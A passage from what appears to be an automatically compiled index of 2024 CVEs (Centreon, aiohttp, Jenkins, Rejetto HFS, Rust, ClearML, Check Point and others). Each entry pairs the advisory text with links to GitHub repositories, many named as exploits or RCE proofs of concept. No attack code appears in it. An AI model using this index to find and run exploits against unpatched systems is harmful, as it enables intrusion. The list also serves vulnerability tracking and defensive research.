- [maybelookis/CVE-2024-23113](https://github.com/maybelookis/CVE-2024-23113)
- [p33d/CVE-2024-23113](https://github.com/p33d/CVE-2024-23113)
- [groshi/CVE-2024-23113-Private-POC](https://github.com/groshi/CVE-2024-23113-Private-POC)
- [Jaden1419/CVE-2024-23113](https://github.com/Jaden1419/CVE-2024-23113)
- [hatvix1/CVE-2024-23113](https://github.com/hatvix1/CVE-2024-23113)
- [zgimszhd61/CVE-2024-23113](https://github.com/zgimszhd61/CVE-2024-23113)
- [puckiestyle/CVE-2024-23113](https://github.com/puckiestyle/CVE-2024-23113)
### CVE-2024-23116 (2024-04-01)
Centreon updateLCARelation SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the updateLCARelation function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22296.
- [zgimszhd61/CVE-2024-23116](https://github.com/zgimszhd61/CVE-2024-23116)
### CVE-2024-23117 (2024-04-01)
Centreon updateContactServiceCommands SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the updateContactServiceCommands function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22297.
- [zgimszhd61/CVE-2024-23117](https://github.com/zgimszhd61/CVE-2024-23117)
### CVE-2024-23118 (2024-04-01)
Centreon updateContactHostCommands SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the updateContactHostCommands function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22298.
- [zgimszhd61/CVE-2024-23118](https://github.com/zgimszhd61/CVE-2024-23118)
### CVE-2024-23208 (2024-01-23)
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.
- [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test)
### CVE-2024-23334 (2024-01-29)
aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.
- [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334)
- [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream)
- [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC)
- [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334)
- [brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334)
- [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334)
- [s4botai/CVE-2024-23334-PoC](https://github.com/s4botai/CVE-2024-23334-PoC)
- [wizarddos/CVE-2024-23334](https://github.com/wizarddos/CVE-2024-23334)
### CVE-2024-23339 (2024-01-22)
hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties.
- [200101WhoAmI/CVE-2024-23339](https://github.com/200101WhoAmI/CVE-2024-23339)
### CVE-2024-23443 (2024-06-19)
A high-privileged user, allowed to create custom osquery packs 17 could affect the availability of Kibana by uploading a maliciously crafted osquery pack.
- [zhazhalove/osquery_cve-2024-23443](https://github.com/zhazhalove/osquery_cve-2024-23443)
### CVE-2024-23652 (2024-01-31)
BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.
- [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652)
### CVE-2024-23692 (2024-05-31)
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
- [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692)
- [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS)
- [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692)
- [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE)
- [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692)
- [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp)
- [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692)
- [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP)
- [pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692](https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692)
- [verylazytech/CVE-2024-23692](https://github.com/verylazytech/CVE-2024-23692)
### CVE-2024-23708 (2024-05-07)
In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [uthrasri/CVE-2024-23708](https://github.com/uthrasri/CVE-2024-23708)
### CVE-2024-23709 (2024-05-07)
In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.
- [AbrarKhan/external_sonivox_CVE-2024-23709](https://github.com/AbrarKhan/external_sonivox_CVE-2024-23709)
### CVE-2024-23722 (2024-03-26)
In Fluent Bit 2.1.8 through 2.2.1, a NULL pointer dereference can be caused via an invalid HTTP payload with the content type of x-www-form-urlencoded. It crashes and does not restart. This could result in logs not being delivered properly.
- [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc)
### CVE-2024-23727 (2024-03-28)
The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.
- [actuator/yi](https://github.com/actuator/yi)
### CVE-2024-23738 (2024-01-28)
An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.."
- [giovannipajeu1/CVE-2024-23738](https://github.com/giovannipajeu1/CVE-2024-23738)
### CVE-2024-23739 (2024-01-28)
An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
- [giovannipajeu1/CVE-2024-23739](https://github.com/giovannipajeu1/CVE-2024-23739)
### CVE-2024-23740 (2024-01-28)
An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
- [giovannipajeu1/CVE-2024-23740](https://github.com/giovannipajeu1/CVE-2024-23740)
### CVE-2024-23741 (2024-01-28)
An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
- [giovannipajeu1/CVE-2024-23741](https://github.com/giovannipajeu1/CVE-2024-23741)
### CVE-2024-23742 (2024-01-28)
An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine.
- [giovannipajeu1/CVE-2024-23742](https://github.com/giovannipajeu1/CVE-2024-23742)
### CVE-2024-23743 (2024-01-28)
Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment."
- [giovannipajeu1/CVE-2024-23743](https://github.com/giovannipajeu1/CVE-2024-23743)
### CVE-2024-23745 (2024-01-31)
In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.
- [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745)
### CVE-2024-23746 (2024-02-02)
Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).
- [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746)
### CVE-2024-23747 (2024-01-29)
The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.
- [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747)
### CVE-2024-23772 (2024-04-30)
An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges.
- [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772)
### CVE-2024-23773 (2024-04-30)
An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file delete vulnerability exists in the KSchedulerSvc.exe component. Local attackers can delete any file of their choice with NT Authority\SYSTEM privileges.
- [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773)
### CVE-2024-23774 (2024-04-30)
An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An unquoted Windows search path vulnerability exists in the KSchedulerSvc.exe and AMPTools.exe components. This allows local attackers to execute code of their choice with NT Authority\SYSTEM privileges.
- [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774)
### CVE-2024-23780
- [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780)
### CVE-2024-23897 (2024-01-24)
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
- [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315)
- [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897)
- [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897)
- [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897)
- [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897)
- [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897)
- [3yujw7njai/CVE-2024-23897](https://github.com/3yujw7njai/CVE-2024-23897)
- [10T4/PoC-Fix-jenkins-rce_CVE-2024-23897](https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897)
- [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897)
- [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897)
- [r0xdeadbeef/CVE-2024-23897](https://github.com/r0xdeadbeef/CVE-2024-23897)
- [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897)
- [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897)
- [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897)
- [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE)
- [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-)
- [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897)
- [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability)
- [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897)
- [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897)
- [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897)
- [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897)
- [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read)
- [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897)
- [Abo5/CVE-2024-23897](https://github.com/Abo5/CVE-2024-23897)
- [JAthulya/CVE-2024-23897](https://github.com/JAthulya/CVE-2024-23897)
- [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897)
- [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441)
- [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897)
- [Surko888/Surko-Exploit-Jenkins-CVE-2024-23897](https://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897)
- [cc3305/CVE-2024-23897](https://github.com/cc3305/CVE-2024-23897)
- [NoSpaceAvailable/CVE-2024-23897](https://github.com/NoSpaceAvailable/CVE-2024-23897)
- [BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety](https://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety)
- [ShieldAuth-PHP/PBL05-CVE-Analsys](https://github.com/ShieldAuth-PHP/PBL05-CVE-Analsys)
- [verylazytech/CVE-2024-23897](https://github.com/verylazytech/CVE-2024-23897)
- [zgimszhd61/CVE-2024-23897-poc](https://github.com/zgimszhd61/CVE-2024-23897-poc)
### CVE-2024-23995 (2024-04-29)
Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container.
- [EQSTLab/CVE-2024-23995](https://github.com/EQSTLab/CVE-2024-23995)
### CVE-2024-23997 (2024-07-05)
Lukas Bach yana =<1.0.16 is vulnerable to Cross Site Scripting (XSS) via src/electron-main.ts.
- [EQSTLab/CVE-2024-23997](https://github.com/EQSTLab/CVE-2024-23997)
### CVE-2024-23998 (2024-07-05)
goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.vue.
- [EQSTLab/CVE-2024-23998](https://github.com/EQSTLab/CVE-2024-23998)
### CVE-2024-24034 (2024-02-08)
Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code.
- [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034)
### CVE-2024-24035 (2024-03-07)
Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter.
- [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035)
### CVE-2024-24134 (2024-01-29)
Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.
- [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134)
### CVE-2024-24135 (2024-01-29)
Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.
- [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135)
### CVE-2024-24136 (2024-01-29)
The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.
- [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136)
### CVE-2024-24137
- [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137)
### CVE-2024-24138
- [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138)
### CVE-2024-24139 (2024-01-29)
Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.
- [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139)
### CVE-2024-24140 (2024-01-29)
Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.'
- [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140)
### CVE-2024-24141 (2024-01-29)
Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.
- [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141)
### CVE-2024-24142 (2024-02-13)
Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.
- [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142)
### CVE-2024-24336 (2024-03-19)
A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components.
- [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336)
### CVE-2024-24337 (2024-02-12)
CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
- [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337)
### CVE-2024-24386 (2024-02-15)
An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.
- [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386)
### CVE-2024-24396 (2024-02-05)
Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.
- [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396)
### CVE-2024-24397 (2024-02-05)
Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.
- [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397)
### CVE-2024-24398 (2024-02-06)
Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.
- [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398)
### CVE-2024-24401 (2024-02-26)
SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.
- [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401)
### CVE-2024-24402 (2024-02-26)
An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component.
- [MAWK0235/CVE-2024-24402](https://github.com/MAWK0235/CVE-2024-24402)
### CVE-2024-24409
- [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409)
### CVE-2024-24488 (2024-02-07)
An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.
- [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488)
### CVE-2024-24520 (2024-02-29)
An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.
- [xF-9979/CVE-2024-24520](https://github.com/xF-9979/CVE-2024-24520)
### CVE-2024-24549 (2024-03-13)
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.\n\nUsers are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.\n\n
- [Abdurahmon3236/CVE-2024-24549](https://github.com/Abdurahmon3236/CVE-2024-24549)
### CVE-2024-24576 (2024-04-09)
Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.\n\nThe `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.\n\nOn Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.\n\nOne exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.\n\nDue to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.\n\nThe fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.
- [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC)
- [brains93/CVE-2024-24576-PoC-Python](https://github.com/brains93/CVE-2024-24576-PoC-Python)
- [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit)
- [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim)
- [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo)
- [mishalhossin/CVE-2024-24576-PoC-Python](https://github.com/mishalhossin/CVE-2024-24576-PoC-Python)
- [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl)
- [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust)
- [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut)
### CVE-2024-24590 (2024-02-06)
Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n
- [OxyDeV2/ClearML-CVE-2024-24590](https://github.com/OxyDeV2/ClearML-CVE-2024-24590)
- [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit)
- [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC)
- [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590)
- [sviim/ClearML-CVE-2024-24590-RCE](https://github.com/sviim/ClearML-CVE-2024-24590-RCE)
- [Bigb972003/cve-2024-24590](https://github.com/Bigb972003/cve-2024-24590)
- [j3r1ch0123/CVE-2024-24590](https://github.com/j3r1ch0123/CVE-2024-24590)
### CVE-2024-24684 (2024-05-28)
Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the header parsing occuring while processing an `.off` file via the `readOFF` function. \r\n\r\n\r\nWe can see above that at [0] a stack-based buffer called `comment` is defined with an hardcoded size of `1000 bytes`. The call to `fscanf` at [1] is unsafe and if the first line of the header of the `.off` files is longer than 1000 bytes it will overflow the `header` buffer.
- [SpiralBL0CK/CVE-2024-24684](https://github.com/SpiralBL0CK/CVE-2024-24684)
### CVE-2024-24685 (2024-05-28)
Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the vertex section of an `.off` file processed via the `readOFF` function.
- [SpiralBL0CK/CVE-2024-24685](https://github.com/SpiralBL0CK/CVE-2024-24685)
### CVE-2024-24686 (2024-05-28)
Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the faces section of an `.off` file processed via the `readOFF` function.
- [SpiralBL0CK/CVE-2024-24686](https://github.com/SpiralBL0CK/CVE-2024-24686)
### CVE-2024-24725 (2024-03-23)
Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI.
- [MelkorW/CVE-2024-24725-PoC](https://github.com/MelkorW/CVE-2024-24725-PoC)
### CVE-2024-24760 (2024-02-02)
mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`.
- [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760)
### CVE-2024-24787 (2024-05-08)
On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive.
- [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC)
### CVE-2024-24809 (2024-04-10)
Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.
- [fa-rrel/CVE-2024-24809-Proof-of-concept](https://github.com/fa-rrel/CVE-2024-24809-Proof-of-concept)
### CVE-2024-24816 (2024-02-07)
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts.
- [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816)
### CVE-2024-24919 (2024-05-28)
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
- [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919)
- [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919)
- [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919)
- [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919)
- [yagyuufellinluvv/CVE-2024-24919](https://github.com/yagyuufellinluvv/CVE-2024-24919)
- [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919)
- [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919)
- [P3wc0/CVE-2024-24919](https://github.com/P3wc0/CVE-2024-24919)
